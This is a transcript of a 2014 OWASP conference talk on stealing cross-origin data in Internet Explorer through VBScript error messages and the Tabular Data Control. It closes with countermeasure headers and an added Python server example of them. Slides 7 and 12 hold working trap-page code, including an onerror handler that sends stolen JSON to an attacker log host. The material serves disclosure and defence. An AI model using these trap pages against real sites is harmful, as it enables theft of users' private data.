Bypass SOP, Theft Your Data - XSS Allstars from Japan / OWASP AppSec APAC 2014
1. Bypass SOP, Theft your data - XSS Allstars from Japan -
   Yosuke HASEGAWA

2. About Me
   Yosuke HASEGAWA @hasegawayosuke
   Engineer of NetAgent Co.,Ltd.
   Secure Sky Technology Inc. technical adviser
   http://utf-8.jp/
   author of jjencode, aaencode, ...
   OWASP Kansai Chapter Leader
   OWASP Japan Chapter Advisory Board member

3. Agenda
   Cross-Origin information disclosure
   Not XSS, but bypass SOP
   Introduce 2 ways for modern IE:
   - VBScript Error msg
   - Tabular Data Control
4. VBScript Error message

5. VBScript Error Msg
   Target: IE9-10 (IE6-8 are safe, wow!)
   Reading a JSON Array as VBScript on a trap page created by the attacker:
   VBScript raises an exception whose error message includes the JSON content,
   so JavaScript can read the JSON content via the error message.

6. VBScript Error Msg
   Reading JSON as VBScript src fails → raises exception

   // Trap page by attacker
   <script src="http://example.jp/target.json" language="vbscript">
   </script>

   HTTP/1.1 200 OK
   Content-Type: application/json; charset=utf-8

   [ "secret", "data", "is", "here" ]

7. VBScript Error Msg
   catch error msg with error handler

   <script>
   window.onerror = function( e ){
     // e is the VBScript error message, which carries the JSON body
     document.getElementById( "img" ).setAttribute( "src",
       "http://attacker.utf-8.jp/log?" + e );
   }
   </script>
   <script src="http://example.jp/target.json" language="vbscript"></script>

   Request received by the attacker's log server:

   GET http://attacker.utf-8.jp/log?Type%20mismatch:%20'%20"secret",%20"message",%20"is",%20"here"%20' HTTP/1.1
   Referer: http://attacker.utf-8.jp/
   User-Agent: Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)

8. Countermeasure
   add "X-Content-Type-Options: nosniff"

   HTTP/1.1 200 OK
   Content-Type: application/json; charset=utf-8
   X-Content-Type-Options: nosniff

   [ "secret", "data", "is", "here" ]

9. VBScript Error Msg - supplementary
   Dec 2012: reported to MS by me and @masa141421356
   May 2013: Fixed with MS13-037 only for IE6-8. IE9-10 was not.
   "Add X-C-T-O header for IE9-11 to prevent from this attack, this is BEHAVIOR BY DESIGN" they said.
10. Tabular Data Control

11. Tabular Data Control - TDC
    ActiveX Control for binding a text file into HTML as a data table
    http://msdn.microsoft.com/en-us/library/ms531356.aspx
    Enabled by default on IE6-IE11, with older doc-mode:
    <meta http-equiv="x-ua-compatible" content="IE=10">
    Spotlighted by Cure53 X-Mas Challenge
    https://cure53.de/xmas2013/
    https://cure53.de/xmas2013/writeup
    The winner is @kinugawamasato

12. Tabular Data Control

    // Trap page by attacker on attacker.utf-8.jp
    function show(){
      var s = document.getElementById("tdc")
                .recordset.getString();
      alert( s );
    }
    ...
    <meta http-equiv="x-ua-compatible" content="IE=10" >
    <object id="tdc" ondatasetcomplete="show()"
            classid="clsid:333C7BC4-460F-11D0-BC04-0080C7055A83">
      <param name="DataURL" value="http://example.jp/target.txt">
    </object>

    // target page including secret data on example.jp/target.txt
    Content-Type: application/octet-stream
    Content-Disposition: attachment; filename=bindata
    X-Content-Type-Options: nosniff

    @!allow_domains=attacker.utf-8.jp
    secret,data,is,here

13. Tabular Data Control
    The attacker has to insert "@!allow_domains=..." into the top of the target text.
    Once inserted, there is no way to prevent the theft.
    Unhelpful:
    - X-Content-Type-Options: nosniff
    - Content-Disposition: attachment
14. Countermeasure
    Restrict access to XHR requests with a custom X- header
    and / or...

    var xhr = new XMLHttpRequest();
    xhr.open( "GET", "http://example.jp/target.txt", true );
    xhr.setRequestHeader("X-Requested-With", "XMLHttpRequest");
    xhr.send( null );

    GET /target.json HTTP/1.1
    Host: example.jp
    User-Agent: Mozilla/5.0…
    Accept: */*
    X-Requested-With: XMLHttpRequest

15. Countermeasure (cont.)
    Don't allow the attacker to place text at the top of the content

    // target page including secret data on example.jp/target.txt
    Content-Type: application/octet-stream
    Content-Disposition: attachment; filename=bindata
    X-Content-Type-Options: nosniff

    @!allow_domains=attacker.utf-8.jp
    secret,data,is,here
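The three countermeasures from slides 8, 14 and 15 combined into one server-side handler, as an added example (not code from the talk): every response carries X-Content-Type-Options: nosniff, the resource is only served to requests carrying the custom X-Requested-With header, and a server-owned first line keeps attacker text out of the top of the TDC text file. The function names, the "#header" line and the sample records are assumptions constructed for the example.

```python
import json

# Constructed sample data standing in for example.jp/target.txt and
# /target.json; the "@!allow_domains" record plays the attacker-inserted line.
USER_RECORDS = ["@!allow_domains=attacker.utf-8.jp", "secret,data,is,here"]
JSON_DATA = ["secret", "data", "is", "here"]

def has_custom_header(environ):
    # WSGI exposes X-Requested-With as HTTP_X_REQUESTED_WITH; a <script src>
    # or TDC <object> fetch cannot set it, only XHR from the same origin can.
    return environ.get("HTTP_X_REQUESTED_WITH") == "XMLHttpRequest"

def render_text(records):
    # Slide 15: never let attacker text occupy the top of the file. A fixed
    # server-owned first line (assumed name "#header") takes that position,
    # and any stored record that looks like a TDC "@!" directive is dropped.
    safe = ["#header"] + [r for r in records if not r.startswith("@!")]
    return "\n".join(safe) + "\n"

def app(environ, start_response):
    path = environ.get("PATH_INFO", "")
    headers = [("X-Content-Type-Options", "nosniff")]   # slide 8, every response
    if not has_custom_header(environ):                  # slide 14
        headers.append(("Content-Type", "text/plain; charset=utf-8"))
        start_response("403 Forbidden", headers)
        return [b"X-Requested-With: XMLHttpRequest required\n"]
    if path == "/target.json":
        headers.append(("Content-Type", "application/json; charset=utf-8"))
        body = json.dumps(JSON_DATA)
    elif path == "/target.txt":
        headers.append(("Content-Type", "text/plain; charset=utf-8"))
        body = render_text(USER_RECORDS)
    else:
        headers.append(("Content-Type", "text/plain; charset=utf-8"))
        start_response("404 Not Found", headers)
        return [b"not found\n"]
    start_response("200 OK", headers)
    return [body.encode("utf-8")]

def request(path, extra_headers=None):
    """Drive app() in-process (no socket) and return (status, headers, body)."""
    environ = {"REQUEST_METHOD": "GET", "PATH_INFO": path}
    for name, value in (extra_headers or {}).items():
        environ["HTTP_" + name.upper().replace("-", "_")] = value
    captured = {}
    def start_response(status, headers):
        captured["status"], captured["headers"] = status, dict(headers)
    body = b"".join(app(environ, start_response)).decode("utf-8")
    return captured["status"], captured["headers"], body
```

Calling request("/target.json") without the header yields a 403, while request("/target.txt", {"X-Requested-With": "XMLHttpRequest"}) returns the file with "#header" on its first line and the "@!allow_domains" record gone.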
16. Conclusion

17. Conclusion
    IE has funny behavior even now
    Add X-Content-Type-Options for all resources
    Restrict access to XHR with a custom X- header

18. Question ?
    hasegawa@utf-8.jp
    @hasegawayosuke
    http://utf-8.jp/